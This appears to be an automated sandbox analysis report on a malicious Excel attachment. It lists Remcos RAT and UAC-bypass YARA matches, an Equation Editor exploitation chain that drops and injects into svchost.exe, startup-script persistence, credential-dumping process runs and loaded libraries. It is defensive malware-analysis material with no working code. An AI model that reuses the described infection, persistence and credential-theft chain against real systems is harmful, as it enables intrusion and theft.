Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: bhv35FF.tmp.13.dr Binary or memory string: org.slneighbors
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@20/40@9/5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021A0F4 GetLastError,FormatMessageW, 10_2_0021A0F4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_002084F3 AdjustTokenPrivileges,CloseHandle, 10_2_002084F3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_00208AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00208AA3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012B84F3 AdjustTokenPrivileges,CloseHandle, 11_2_012B84F3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012B8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_012B8AA3
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_012CB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 11_2_012CB3BF
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0022EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 10_2_0022EF21
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_0021C423 CoInitialize,CoCreateInstance,CoUninitialize, 10_2_0021C423
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 10_2_001B4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 10_2_001B4FE9
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\68730000 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA0B1.tmp Jump to behavior
Source: PO-00006799868.xls OLE indicator, Workbook stream: true
Source: 68730000.0.dr OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\SysWOW64\svchost.exe System information queried: HandleInformation Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.1055411856.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000E.00000002.474748620.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: PO-00006799868.xls ReversingLabs: Detection: 13%
Source: PO-00006799868.xls Virustotal: Detection: 14%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: shcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
